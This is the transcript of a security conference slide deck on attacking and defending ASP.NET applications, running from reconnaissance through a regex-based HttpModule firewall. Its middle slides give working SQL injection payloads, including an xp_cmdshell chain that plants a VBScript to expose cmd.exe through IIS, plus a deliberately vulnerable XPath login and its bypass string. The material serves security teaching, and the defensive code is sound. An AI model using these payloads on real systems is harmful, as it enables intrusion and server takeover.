Hacking and Securing .NET Apps (Infosecworld)

on

  • 113,366 views

 

Statistics

Views

Total Views
113,366
Views on SlideShare
113,185
Embed Views
181

Actions

Likes
6
Downloads
0
Comments
0

33 Embeds 181

http://knitinr.blogspot.com 83
http://www.blueinfy.com 12
http://knitinr.blogspot.de 9
http://knitinr.blogspot.ca 8
http://www.slideshare.net 8
http://shreeraj.blogspot.in 6
http://websecurity.com.ua 5
http://knitinr.blogspot.com.br 5
http://knitinr.blogspot.in 4
http://static.slideshare.net 3
http://knitinr.blogspot.com.au 3
http://www.techgig.com 3
http://knitinr.blogspot.it 3
http://www.secguru.com 3
http://pcsilva.blogspot.com 3
http://knitinr.blogspot.ae 2
http://knitinr.blogspot.sg 2
http://knitinr.blogspot.co.uk 2
http://knitinr.blogspot.com.es 2
http://blueinfy.com 2
http://115.112.206.134 1
http://shreeraj.blogspot.com 1
http://localhost 1
http://knitinr.blogspot.jp 1
http://knitinr.blogspot.cz 1
http://knitinr.blogspot.se 1
http://knitinr.blogspot.co.nz 1
http://static.slidesharecdn.com 1
http://knitinr.blogspot.co.at 1
http://knitinr.blogspot.fr 1
http://translate.googleusercontent.com 1
http://knitinr.blogspot.fi 1
https://www.linkedin.com 1
More...

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Presentation Transcript

  • Session H4 Hacking and Securing .NET
  • Introduction (Brief)
    - Founder & Director: Net Square
    - Past experience: Chase, IBM & Foundstone
    - Interest: Web security research
    - Published: Advisories, Tools, Papers etc.
    - Book: Web Hacking
    - http://shreeraj.blogspot.com, shreeraj@net-square.com
    Shreeraj Shah
  • Agenda
    - Industry trends
    - Technologies
    - Web assets (TCP 80/443)
    - Issues
    - .NET security
    - .Net application attack points
    - Assessment tools & methodology
    - Auditing
    - Defending .Net (controls)
  • Industry
    - WEB 2.0 & Rich Internet Applications are on the rise
    - Web Services framework is picking up. Web services would rocket from $1.6 billion in 2004 to $34 billion by 2007. [IDC]
    - Application layer is becoming critical for business success.
    - Messaging mechanisms are changing.
  • Industry: sample new applications
    - www.live.com
    - www.netvibes.com
    - www.writely.com
    - www.start.com
    - Etc.
  • Infrastructure Evolution - 1 (diagram: Internet, router, intranet with www, mail and database hosts)
  • Infrastructure Evolution - 2 (diagram: adds other offices, Exchange, a DMZ, dial-up/RAS and VPN access)
  • Infrastructure Evolution - 3 (diagram: adds a firewall in front of the DMZ)
  • Defense posture and Evolution (diagram series)
    - Layers: Operating System Level (ipc$, wu-ftpd, sunrpc etc.), Services Level (IIS web, SMTP, POP etc.), Application Level (web/customized etc.), Business Application Level (web services).
    - Traditional attacks (brute force, RPC buffer overflow, null session etc.) target the operating system and services levels. They are blocked ("X") by firewall, VPN, IDS, auth server etc., plus the added defense of accounts, shares, patches/updates, logging/auditing, ports, registries etc.
    - Next generation attacks (SQL injection, parameter tampering etc.) target the application level; an application layer content filtering firewall is the added defense there.
    - Web services attacks target the business application level.
  • Defense posture (diagram): actors (partner, customer, user, supplier, prospect, employee and hacker) reach the application layers (1. Presentation, 2. Business logic, 3. Data Access), which are built on runtime platform services and components; beneath them sit host security (operating system) and network security (routers, firewalls, switches).
  • Evolution of Web applications (diagram series)
    - 1: Web client -> web server (static pages: HTML, HTM etc.) -> scripted web engine (dynamic pages: ASP, DHTML, PHP, CGI etc.) in the DMZ; the DB sits in the internal/corporate zone.
    - 2: adds trusted application servers (WebLogic, ColdFusion etc.) between the web engine and the DB.
    - 3: adds a middle layer of components (COM, Beans etc.).
    - 4: application servers and integrated frameworks (ASP.NET with .Net, J2EE app server, web services etc.).
    - 5: a SOAP web services client reaches the web services layer directly, alongside the web client.
  • Technologies
    - Web Services are forming the back end and are accessible over SOAP
    - AJAX: empowering browsers
    - XML based services
    - Rich Internet Applications are consuming back end web services
    - Search engines and mechanisms for web services publishing and accessing
    - Security evolving around web services
  • Technologies (diagram): the web server exposes simple HTTP resources via simple GET/POST, and web services resources via AJAX calls and web services clients. DEMO: Start.com
  • Security!
    - 95% of companies were hacked through web applications and 5% of them were aware of it - FBI/CSI
    - Most popular attacks are against the web server - incident.org
    - 3 out of 4 web sites are vulnerable to attack (Gartner)
    - 75% of hacks occur at the application level (Gartner)
    - Every 1500 lines of code has one security vulnerability (IBM Labs)
    - 2000 attacks / week for an unprotected web site
  • Security! "Over 80% of all malicious attacks target port 80." - Network World (bar chart of attack categories: web server vulnerabilities, SQL injection, cross-site scripting, buffer overflows, cookie poisoning, parameter tampering, services vulnerabilities, others)
  • Security! CSI Security Survey, vulnerability distribution (pie chart): programming errors 64%; misconfiguration and other problems 36%
  • Defining Methods
    - Black Box Method: analyzing the application from an attacker's perspective, seeing only the web resources available to a common user, like just ports 80 and 443.
    - White Box Method: analyzing the application with full knowledge and access: the deployment setup, source code and other resources on the box.
  • Traditional - Application (diagram)
    - Phase 1: Internet systems, internal systems and application vulnerability assessment; security architecture review
    - Phase 2: Internet systems audit, internal systems audit, app/DB code and application review
    - Phase 3: Internet systems lock-down, internal systems lock-down, app/DB re-code and lock-down
    - Phase 4: continuous security monitoring and assessment
  • Analysis Cycle (diagram)
    - Deployment Analysis (White Box Approach)
    - Application Analysis (Black Box Approach)
    - Attacks Identification (Black Box Approach)
    - Web Application Asset to Attacks Mapping
    - Defense Strategies (White Box Approach)
  • Methodology: Footprinting -> Discovery -> Profiling -> Manual Attacks / Auto Attacks -> Exploit -> Defense
  • Footprinting & Discovery
    - "Host" is essential: the IP/port combination is not enough
    - Old approaches: whois & PTR; may not work
    - New approaches: search engines; advanced whois databases
  • Information Exposure: multi-hosted scenario
        <VirtualHost *:80>
            # ServerAdmin webmaster@dummy-host.example.com
            DocumentRoot /usr/local/apache2/htdocs
            # ErrorLog logs/dummy-host.example.com-error_log
            # CustomLog logs/dummy-host.example.com-access_log common
        </VirtualHost>
        <VirtualHost *:80>
            # ServerAdmin webmaster@dummy-host.example.com
            DocumentRoot /usr/local/apache2/htdocs/blue
            ServerName www.blue.com
            # ErrorLog logs/dummy-host.example.com-error_log
            # CustomLog logs/dummy-host.example.com-access_log common
        </VirtualHost>
        <VirtualHost *:80>
            # ServerAdmin webmaster@dummy-host.example.com
            DocumentRoot /usr/local/apache2/htdocs/red
            ServerName www.red.com
            # ErrorLog logs/dummy-host.example.com-error_log
            # CustomLog logs/dummy-host.example.com-access_log common
        </VirtualHost>
  • Information Exposure: request without a Host header
        C:\Documents and Settings\Administrator> nc 203.88.128.10 80
        HEAD / HTTP/1.0

        HTTP/1.1 200 OK
        Date: Tue, 11 Jan 2005 20:17:40 GMT
        Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
        Content-Location: index.html.en
        Vary: negotiate,accept-language,accept-charset
        TCN: choice
        Last-Modified: Fri, 04 May 2001 00:01:18 GMT
        ETag: "1c4d0-5b0-40446f80;1c4e6-961-8562af00"
        Accept-Ranges: bytes
        Content-Length: 1456
        Connection: close
        Content-Type: text/html; charset=ISO-8859-1
        Content-Language: en
        Expires: Tue, 11 Jan 2005 20:17:40 GMT
  • Information Exposure: Host www.blue.com
        C:\Documents and Settings\Administrator> nc 203.88.128.10 80
        HEAD / HTTP/1.0
        Host: www.blue.com

        HTTP/1.1 200 OK
        Date: Tue, 11 Jan 2005 20:17:45 GMT
        Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
        Last-Modified: Tue, 04 Jan 2005 23:10:29 GMT
        ETag: "1865-b-f991a340"
        Accept-Ranges: bytes
        Content-Length: 11
        Connection: close
        Content-Type: text/html; charset=ISO-8859-1
  • Information Exposure: Host www.red.com
        C:\Documents and Settings\Administrator> nc 203.88.128.10 80
        HEAD / HTTP/1.0
        Host: www.red.com

        HTTP/1.1 200 OK
        Date: Tue, 11 Jan 2005 20:17:57 GMT
        Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
        Last-Modified: Tue, 04 Jan 2005 23:16:57 GMT
        ETag: "1cc0b-9-10b20c40"
        Accept-Ranges: bytes
        Content-Length: 9
        Connection: close
        Content-Type: text/html; charset=ISO-8859-1
  • Information Exposure: whois
        C:\Program Files\GnuWin32\bin>jwhois -h whois.arin.net 203.88.128.10
        [Querying whois.arin.net]
        [whois.arin.net]
        OrgName:    XYZ corp
        OrgID:      XYZC
        Address:    101 First Avenue
        City:       NYC
        StateProv:  NY
        PostalCode: 94089
        Country:    US

        NetRange:   203.88.128.0 - 203.88.128.255
        CIDR:       203.88.128.0/20
        NetName:    XYZC-4
        NetHandle:  NET-203-88-128-0-1
        Parent:     NET-203-0-0-0-0
        NetType:    Direct Allocation
        NameServer: ns1.xyz.com
        NameServer: ns2.xyz.com
        Comment:
        RegDate:    2003-07-17
        Updated:    2003-07-17

        OrgTechHandle: NA098-ARIN
        OrgTechName:   Netblock Admin
        OrgTechPhone:  +1-212-999-9999
        OrgTechEmail:  netblockadmin@xyz.com

        # ARIN WHOIS database, last updated 2005-01-10 19:10
        # Enter ? for additional hints on searching ARIN's WHOIS database.

        C:\Program Files\GnuWin32\bin>
  • Information Exposure: the organisation's own name server answers
        C:\Documents and Settings\Administrator>nslookup
        Default Server:  ns1.icenet.net
        Address:  203.88.128.7

        > server ns1.xyz.com
        Default Server:  [203.88.128.250]
        Address:  203.88.128.250
        > 203.88.128.10
        Server:  [203.88.128.250]
        Address:  203.88.128.250

        Name:    www.blue.com
        Address:  192.168.7.50                  (slide annotation: Bingo!)
        > set type=PTR
        > 203.88.128.10
        Server:  [203.88.128.250]
        Address:  203.88.128.250

        10.128.88.203.in-addr.arpa      name = www.blue.com
        10.128.88.203.in-addr.arpa      name = www.red.com
        >
  • Information Exposure: the ISP's name server only returns a generic client name
        C:\Documents and Settings\Administrator>nslookup
        Default Server:  ns1.icenet.net
        Address:  203.88.128.7

        > server 203.88.128.250
        Default Server:  icedns1.icenet.net
        Address:  203.88.128.250
        > 203.88.128.11
        Server:  icedns1.icenet.net
        Address:  203.88.128.250

        Name:    ice.128.client11.icenet.net    (slide annotation: Sucks!)
        Address:  203.88.128.11
        > set type=PTR
        > 203.88.128.11
        Server:  icedns1.icenet.net
        Address:  203.88.128.250

        Non-authoritative answer:
        11.128.88.203.in-addr.arpa      name = ice.128.client11.icenet.net
        > 203.88.128.11
        Server:  icedns1.icenet.net
        Address:  203.88.128.250

        Non-authoritative answer:
        11.128.88.203.in-addr.arpa      name = ice.128.client11.icenet.net
  • Information Exposure: http://whois.webhosting.info/IP (Bingo!), www.whois.sc
  • Search Engine Kung-Fu
    - Domain & cross domain footprinting: MSN & Google can help
      - "site:" - domain harvesting
      - "link:" (Google) & "linkdomain:" (MSN) - cross domain harvesting
      - "inurl:" - filtering
      - "IP:" (MSN) - host footprinting
    - Advanced methods of footprinting: MSNPawn tool, http://net-square.com/msnpawn
    - DEMO
  • Profile
    - Profiling a web application is a very important task for identifying possible attacks.
    - AJAX and web services calls
    - The objective is to find: where do we get a cookie? where are the forms? does it have applets or objects? are query strings around or not? and such.
    - Regex can be used on the HTML code to fetch this info.
  • Sample Profile (table: for each URL/asset, an X marks which attributes it carries: Form, Comment, Email, Applet, Object, Cookie, Auth., Path, Script, QueryString). Assets listed: /, /cart.aspx, /include/styles.css, /privacy.aspx, /catalog.aspx, /aboutus.aspx, /details.aspx?id=1 through /details.aspx?id=6, /rebates.aspx, /catalog.aspx?start=3, /catalog.aspx?start=6, /rebates.aspx?loc=beckham.html, /rebates.aspx?loc=zhivago.html, /rebates.aspx?loc=monsoon.html, /rebates.aspx?loc=lawrence.html, /orderapp/default.aspx?login=yes, /orderapp/include/styles.css. DEMO
  • Web Application Assets
    - Each identified attribute can have a vulnerability.
    - A vulnerability can be exploited by a hacker.
    - Forms and query strings are the major source of exploitation.
    - Other parameters like cookies, scripts (client side Java, VB etc.) and path info (include, cgi-bin, servlet etc.) expose business level information.
  • Once again public domain usage
    - We can fetch this info from the public domain, like Google: "site:"
    - We can fetch technology clues using "inurl:" or "filetype:"
    - One can fetch "cache" information from Google and profile it as well.
    - It can also be fetched from www.archive.org: http://web.archive.org/web/*www.google.com *
    - DEMO
  • Search Engine Kung-Fu
    - Profiling & fetching a list of URLs: "site:" (advantage: passive & one-shot harvesting)
    - Technology identification from the search engine
    - Vulnerability and resource leakage analysis from the engine: MSNPawn for MSN hacking; Google hacking tools
    - DEMO
  • Deployment Attack Points (diagram over the web application architecture: web client, web server, scripted engine, application servers such as .NET and WebLogic, middle layer components, DB): configuration, backup files, reverse proxy, permissions, config files, extension mapping, directory browsing, common files (web server), integration files, hidden web paths, WEB-INF etc., cross site trace; at the database: roles, extended SPs. DEMO
  • Deployment Analysis for .Net
    - Scanning *.config files
    - Understanding the mapping
    - Directory browsing and other permission checks
    - Metadata can help in automated scanning on .Net
    - DEMO / Code Walk
  • Exposure to asset (diagram): attack agents with motives, goals, tools, techniques & methods exploit a vulnerability or a poor control to reach the asset; security controls and policies stand in between.
  • Impact Trail (diagram series over the web application architecture: web client, web server, scripted engine, application servers, middle layer components, DB)
    - Form / Query String: client side processing, parameter processing, variable processing, and query processing at the DB. Example requests:
          c:\tools>nc <HOST> 80
          GET /account.aspx?id=5 HTTP/1.0
          ...

          c:\tools>nc <HOST> 80
          POST /account.aspx HTTP/1.0
          ...

          Id=5&customer=6
    - Comments / Email: information usage. Examples:
          <a HREF="mailto:admin@example.com">...
          <!-- code in db.inc changed 12/12/2002 by John -->
    - Applet / Object: client side processing, data processing. Examples:
          <applet codebase=./code/> ... </applet>
          <object classid=5672....></object>
    - Cookie: session management across the layers (client side session usage, session decision, application cookie, transport layer state). Example:
          HTTP/1.x 200 OK
          ....
          Set-Cookie: ASPSESSIONIDCSSBBRQR=MKELONCBPANNHEKHCFGABJGB; CID=1
    - Authentication: form based (user/pass), NTLM/BASIC/DIGEST etc.; client side control, ACL based decisions, data access based on ACL.
  • Asset - Impact Observations (table: which assets - Form, Comment, Email, Applet, Object, Cookie, Auth., Path, Script, QueryString - affect which logic layer: Presentation, Business, Data Access)
  • Asset to Attack Mapping (table: each asset mapped to the attack classes it exposes): Input Validation, Authorization, Parameter Tampering, Authentication, Brute Forcing, Session Management, SQL Manipulation, File Operations, Information Leakage, Error/Exception management, Client Side Manipulation, Java Decompile, Cryptography, Buffer Overflows, Remote Command Execution
  • Source Code Disclosure
    - Ability to retrieve application files in an unparsed manner.
    - Attackers can recover the source code of the web application itself.
    - The code can then be used to find further loopholes / trophies.
    - May be caused in many ways: misconfiguration or vendor errors; poor application design, etc.
  • Input Validation
    - Root cause of most web hacks.
    - All inputs received should be validated: data types; data ranges (e.g. negative or fractional numbers); buffer sizes and bounds; metacharacters.
    - Tampering with hidden fields.
    - Bypassing client side checking (e.g. JavaScript).
  • Data types and HTTP
    - In HTTP, everything is a string.
    - Assign data types for each parameter.
    - Basic data types: integer, string, date, floating point, etc.
    - Complex data types: file path, session identifier, credentials, etc.
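A typed-parameter validator as an added example (not code from the slides) that applies the rules above to the deck's own parameters (details.aspx?id=, rebates.aspx?loc=): each string is bound to a type, a range and a shape before use, and a rejected value never reaches a query or a file open. The base directory and the sample values are constructed.

```csharp
using System;
using System.Globalization;
using System.IO;

// Added example: every HTTP parameter arrives as a string, so each one is
// bound to an explicit type, range and shape before the application uses it.
public static class ParamValidator
{
    // Integer ids such as details.aspx?id=1: digits only (no sign, no fraction,
    // no whitespace, no "3 OR 1=1"), bounded to a sane range.
    public static bool TryParseId(string raw, int max, out int id)
    {
        id = 0;
        if (string.IsNullOrEmpty(raw) || raw.Length > 9) return false;
        if (!int.TryParse(raw, NumberStyles.None, CultureInfo.InvariantCulture, out id)) return false;
        return id <= max;
    }

    // Dates: exactly one format; "1/11/2005" and "2005-01-11'" both fail.
    public static bool TryParseDate(string raw, out DateTime date)
    {
        return DateTime.TryParseExact(raw, "yyyy-MM-dd", CultureInfo.InvariantCulture,
                                      DateTimeStyles.None, out date);
    }

    // File-path parameters such as rebates.aspx?loc=beckham.html: a bare file
    // name with the expected extension whose resolved path stays under baseDir.
    public static bool TryResolvePath(string baseDir, string raw, string extension, out string fullPath)
    {
        fullPath = null;
        if (string.IsNullOrEmpty(raw) || raw.Length > 64) return false;
        if (raw.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0) return false;
        if (raw.IndexOf('/') >= 0 || raw.IndexOf('\\') >= 0 || raw.Contains("..")) return false;
        if (!raw.EndsWith(extension, StringComparison.OrdinalIgnoreCase)) return false;
        string root = Path.GetFullPath(baseDir).TrimEnd(Path.DirectorySeparatorChar) + Path.DirectorySeparatorChar;
        string candidate = Path.GetFullPath(Path.Combine(root, raw));
        // Belt and braces: even if a name slipped through, it must resolve under root.
        if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return false;
        fullPath = candidate;
        return true;
    }

    public static void Main()
    {
        int id;
        foreach (string raw in new[] { "5", "-1", "3.5", "3 OR 1=1", "99999999999" })
            Console.WriteLine("id '{0}': {1}", raw, TryParseId(raw, 100000, out id) ? "ok " + id : "rejected");

        DateTime date;
        foreach (string raw in new[] { "2005-01-11", "1/11/2005", "2005-01-11'" })
            Console.WriteLine("date '{0}': {1}", raw, TryParseDate(raw, out date) ? "ok" : "rejected");

        string path;
        string rebates = Path.Combine(Path.GetTempPath(), "rebates"); // constructed base directory
        foreach (string raw in new[] { "beckham.html", "..\\web.config", "zhivago.html%00.txt" })
            Console.WriteLine("loc '{0}': {1}", raw,
                TryResolvePath(rebates, raw, ".html", out path) ? "ok " + path : "rejected");
    }
}
```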
  • SQL Query Poisoning
    - Parameters from the URL or input fields get used in SQL queries.
    - An instance of input validation attacks.
    - Data can be altered to extend the SQL query: http://server/query.asp?item=3+OR+1=1
    - Execution of stored procedures.
    - May even lead to back-end database server compromise.
  • Force SQL errors
    - Insert meta-characters around or within the parameters.
    - Range testing: BOF or EOF.
    - Changing the data type.
    - Premature query termination: quotation marks ' or "; trailing hyphens --
    - Look for error messages generated by the database.
  • Identifying SQL errors
    - Try to force error messages from the database server.
    - Gives us an idea of how the SQL query is being created and used.
    - Tamper with the input parameter: change the data type; premature termination by ' " etc.
    - If the SQL query fails, we have a candidate for SQL injection.
  • Identifying SQL errors
    - Identify which resources contain SQL interfaces.
    - Identify the offending parameters which cause the SQL queries to break.
    - The root cause of all SQL query poisoning is lack of input sanitization.
    - Strip off meta-characters.
  • Extend SQL queries
    - Add valid SQL clauses to extend the SQL query.
    - "OR 1=1": returns all rows.
    - ";SELECT ...": multiple queries.
    - ";EXEC ...": stored procedures.
  • Executing Stored Procedures
    - SQL injection attacks can be extended beyond excessive data retrieval.
    - Stored procedures, if known and accessible, can also be invoked; for example Microsoft SQL Server's extended stored procedures.
    - Use the SQL "EXEC" statement.
  • SQL Injection: what if it is blind?
    - You don't know the web root
    - The firewall doesn't allow outbound traffic
    - If you know the web root, it is not providing write rights.
    - xp_cmdshell? May or may not be working.
    - Is it running as "sa"?
  • Making "sa" check...
    - Querying the process on SQL using SPs:
          (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
    - The final query would be "and":
          ?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114
    - DEMO
  • Pulling "winnt" out...
    - Echoing the following lines blindly using xp_cmdshell...
          Set WshShell = WScript.CreateObject("WScript.Shell")
          Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
          windir = ObjExec.StdOut.ReadLine()
          Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
          Set Dir = Root.Create("IIsWebVirtualDir", "secret")
          Dir.Path = windir
          Dir.AccessExecute = True
          Dir.SetInfo
  • Echoing...
    - http://target/details.aspx?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs' ..... and so on (all lines)
    - Now run the VBScript: http://target/details.aspx?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs'
    - Check http://target/secret/system32/cmd.exe?+/c+set  Bingo! DEMO
  • With metasploit...
  • XPATH Injection
    - XPATH is a language defined to find information in an XML document.
    - As the name suggests, XPATH uses paths to traverse the nodes of an XML document and look for specific information in it.
    - XPATH provides expressions like slash (/), double slash (//), dot (.), double dot (..), @, =, <, > etc. that help in traversing an XML document.
  • XPATH - Vulnerable Code
        using System.Xml;
        using Microsoft.Data.SqlXml;

        // Deliberately vulnerable: user and pass are concatenated straight into the XPath expression.
        bool CheckCredential(string user, string pass)
        {
            string fulltext = "";
            string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
            SqlXmlCommand co = new SqlXmlCommand(coString);
            co.RootTag = "Credential";
            co.CommandType = SqlXmlCommandType.Sql;
            co.CommandText = "SELECT * FROM users for xml Auto";
            XmlReader xr = co.ExecuteXmlReader();
            xr.MoveToContent();
            fulltext = xr.ReadOuterXml();          // the whole users table as XML
            XmlDocument doc = new XmlDocument();
            doc.LoadXml(fulltext);
            string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
            XmlNodeList xmln = doc.SelectNodes(credential);
            if (xmln.Count > 0)
            {
                return true;   // a node matched: login accepted
            }
            else
            {
                return false;  // no match
            }
        }
  • Attacking XPATH point
    - //users[@username='"+user+"' and @password='"+pass+"']
    - XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
    - This is always true on the first node, and the user gets access as whoever the first user is:
          //users[@username='' or 1=1 or ''='' and @password='any']
    - Bingo! DEMO
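The credential check from the vulnerable slide rebuilt so that user and pass are embedded as XPath string literals, as an added example (not the presenter's code): the users XML is constructed inline in place of the SqlXmlCommand result, and XPathLiteral is a helper name chosen here.

```csharp
using System;
using System.Text;
using System.Xml;

// Added example: the slide's "//users[@username='..' and @password='..']"
// lookup with both values quoted as XPath literals, so the "' or 1=1 or ''='"
// payload is compared as a plain string instead of changing the predicate.
public static class SafeXPathLogin
{
    // Constructed stand-in for the XML the slide's SqlXmlCommand would return.
    const string UsersXml =
        "<Credential>" +
        "<users username='admin' password='s3cret'/>" +
        "<users username='bob' password='bobpass'/>" +
        "</Credential>";

    // Turns an arbitrary string into an XPath 1.0 expression that evaluates to
    // exactly that string. XPath 1.0 literals have no escape syntax, so a value
    // containing both quote kinds is assembled with concat().
    public static string XPathLiteral(string value)
    {
        if (value.IndexOf('\'') < 0) return "'" + value + "'";
        if (value.IndexOf('"') < 0) return "\"" + value + "\"";
        var sb = new StringBuilder("concat(");
        string[] parts = value.Split('\'');          // parts never contain a single quote
        for (int i = 0; i < parts.Length; i++)
        {
            if (i > 0) sb.Append(", \"'\", ");        // re-insert the split-off quote as "'"
            sb.Append('\'').Append(parts[i]).Append('\'');
        }
        return sb.Append(')').ToString();
    }

    // Same query shape as the slide, with both values passed through XPathLiteral.
    public static bool CredentialsMatch(string user, string pass)
    {
        var doc = new XmlDocument();
        doc.LoadXml(UsersXml);
        string credential = "//users[@username=" + XPathLiteral(user) +
                            " and @password=" + XPathLiteral(pass) + "]";
        return doc.SelectNodes(credential).Count > 0;
    }

    public static void Main()
    {
        // Legitimate login.
        Console.WriteLine(CredentialsMatch("bob", "bobpass"));
        // The slide's payload: now just a username nobody has.
        Console.WriteLine(CredentialsMatch("' or 1=1 or ''='", "any"));
        // Both quote kinds at once: exercises the concat() path and still parses.
        Console.WriteLine(CredentialsMatch("it's \"x\"", "p"));
    }
}
```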
  • Session Identifiers
    - The hash key: "session identifier"
    - A unique value for every session.
    - Passed back and forth between the browser and the server.
    - Implemented by a session cookie: PHP PHPSESSID; ASP ASPSESSIONID; JSP jsessionid, etc.
  • Session Identifiers
    - Non-sequenceable: should not be serially incremented.
    - Cryptographically generated, e.g. MD5(current time stamp + random salt); impossible to reverse-engineer.
    - It may be possible to change the session cookie value... but there is no way of guessing other session cookie values.
  • AJAX hacking
    - AJAX: silent killer
    - Can fetch information from an SSL site
    - Dynamic execution of the script
    - XML object: fetching information
    - DEMO / Code Walk
  • Source Code Review
    - Analyzing source code
    - .NET code analysis
    - Web application code review
    - What to look for?
    - How to grab the right information?
    - Let's see demo and tools
    - DEMO / Code Walk
  • Binary audit
    - .NET application binary analysis
    - Important step
    - Look for key security information
    - How to analyze the binary?
    - What to look for?
    - Tools & Demo
    - DEMO / Code Walk
  • What is new in .Net?
    - A web application has a separate scope and the HTTP pipeline can be accessed.
    - ISAPI had some limitations which are not there with the HTTP interfaces.
    - The HTTP request can be accessed before it hits application resources.
    - HttpModule and HttpHandler are defense at your gates.
    - Can we build a web application firewall and IDS? "YES"
  • Web Application without defense (diagram): web client -> corporate firewall -> IIS web server -> web application resources -> DB in the internal/corporate zone
  • Web Application - Defense at gates (diagram): (1) a web application firewall and (2) a web application IDS inserted in the IIS web server in front of the application resources
  • HTTP Stack for .Net (diagram): client request/response -> IIS -> aspnet_isapi.dll -> HttpApplication running a chain of HttpModules -> HttpHandler -> web application resource
  • HTTP Stack for .Net (class diagram): HttpRuntime -> HttpApplicationFactory -> HttpApplication (IHttpModule; HttpContext with HttpRequest/HttpResponse) -> HttpHandlerFactory -> IHttpHandler handler
  • Leveraging
    - HttpModule and HttpHandler can be leveraged.
    - An application layer firewall can be cooked up for your application.
    - Similarly an IDS for the web application can be developed.
    - It sits in the HTTP pipe and defends web applications.
  • HTTP Stack for .Net (diagram): the Web Application Firewall & IDS implemented as an IHttpModule sits between HttpApplicationFactory/HttpApplication and HttpHandlerFactory/Handler
  • IHttpModule - Events: capturing events when the HTTP request arrives.
  • IHttpModule - Events: capturing events when the HTTP response is about to go.
  • IHttpModule - Events: pre-send events.
  • Initializing using System; Extending Interface using System.Web; using System.Text.RegularExpressions; namespace webfirewall { public class webfirewall : IHttpModule { NOTE: The sample code shown here is written in C#. You must create a project as “Class Library” since you will be creating a .dll file that fits into the IIS HTTP processing chain or pipe. “System.Web” must be included as reference assembly to the project. The IHTTPModule interface resides in “System.Web”. Shreeraj Shah
  • Regex Filtering capability Adding regex filtering for incoming requests and parameters public string[] setPattern(string doc,string pat,int num) { Regex exp = new Regex(@pat,RegexOptions.IgnoreCase); MatchCollection mc = exp.Matches(doc); string[] results = new string[mc.Count]; for (int i=0;i<mc.Count;i++) { Match FirstMatch = mc[i]; results[i] = FirstMatch.Groups[num].ToString(); } return results; } Shreeraj Shah
• Accessing HTTP stack
  • Creating the Application stack instance
  • Capturing the event for processing

    public void Init(HttpApplication httpApp)
    {
        // Subscribe to BeginRequest so every incoming request is inspected
        httpApp.BeginRequest += new EventHandler(this.OnBeginRequest);
    }
• Accessing HTTP stack
  • Firewall and IDS rules for GET and POST requests

    string[] query, post;

    public void Init(HttpApplication App)
    {
        App.BeginRequest += new EventHandler(this.ProcessRequest);
        // Rules file: regex patterns wrapped in <QUERY>...</QUERY> and <POST>...</POST> tags
        // (path separators were lost in extraction; reconstructed as firewallrules\config.ini)
        string inifile = Environment.CurrentDirectory + "\\firewallrules\\config.ini";
        System.IO.StreamReader reader = new System.IO.StreamReader(inifile);
        string data = reader.ReadToEnd();
        reader.Close();
        // Capture group 1 holds the pattern itself
        query = setPattern(data, "<QUERY>(.*?)</QUERY>", 1);
        post = setPattern(data, "<POST>(.*?)</POST>", 1);
    }
• Example GET & POST

  GET request:
  http://192.168.131.3/dvds4less/details.aspx?id=1

  POST request:
  POST /dvds4less/checkout_form.aspx HTTP/1.1
  Host: 192.168.131.3
  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20040910
  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Referer: http://192.168.131.3/dvds4less/cart.aspx?id=1&quantity=1
  Cookie: ASP.NET_SessionId=0zrvzp45nzb1sj45piri0f55
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 60

  product_id_0=1&quantity_0=1&order_num=513745&submit=Checkout

  Attack points: the query string parameter (id=1) and the POST body parameters.
• Trapping HTTP request
  • Using ProcessRequest we can trap the incoming HTTP request.
  • Code for application defense can be plugged in there.

    public void ProcessRequest(object o, EventArgs ea)
    {
        // The event sender is the HttpApplication; it gives access to Request and Response
        HttpApplication app = (HttpApplication)o;
• Processing Query String
  • Defending the query string with the Regex routine

        string querystring = app.Request.ServerVariables["QUERY_STRING"];
        if (query.Length > 0)
        {
            for (int j = 0; j < query.Length; j++)
            {
                // Group 0 is the whole match; any match means a rule fired
                string[] q = setPattern(querystring, query[j], 0);
                if (q.Length > 0)
                {
                    app.Response.Write("Security Error");
                    app.Response.End();
                }
            }
        }
• Processing POST
  • Getting a hook to the POST request bytes.

        string postreq = "";
        if (app.Request.ServerVariables["REQUEST_METHOD"] == "POST")
        {
            long streamLength = app.Request.InputStream.Length;
            byte[] contentBytes = new byte[streamLength];
            app.Request.InputStream.Read(contentBytes, 0, (int)streamLength);
            postreq = System.Text.Encoding.UTF8.GetString(contentBytes);
            // Rewind so the page handler can still read the form data
            app.Request.InputStream.Position = 0;
        }
• Processing POST
  • Processing the POST request bytes.

        if (post.Length > 0)
        {
            for (int k = 0; k < post.Length; k++)
            {
                string[] p = setPattern(postreq, post[k], 0);
                if (p.Length > 0)
                {
                    app.Response.Write("Security Error");
                    app.Response.End();
